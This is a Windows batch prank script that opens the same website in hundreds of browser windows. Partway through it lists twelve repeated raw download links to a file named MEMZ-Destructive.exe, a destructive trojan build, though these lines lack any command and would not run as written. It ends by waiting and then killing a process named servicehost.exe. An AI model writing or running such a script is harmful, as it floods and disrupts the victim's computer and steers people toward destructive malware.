@echo off
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
https://raw.githubusercontent.com/bill-zhanxg/MEMZ_Destructive_Clean-Download/main/MEMZ.exe/MEMZ-Destructive.exe
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
start https://piv.pivpiv.dk/
timeout 20
taskkill /im servicehost.exe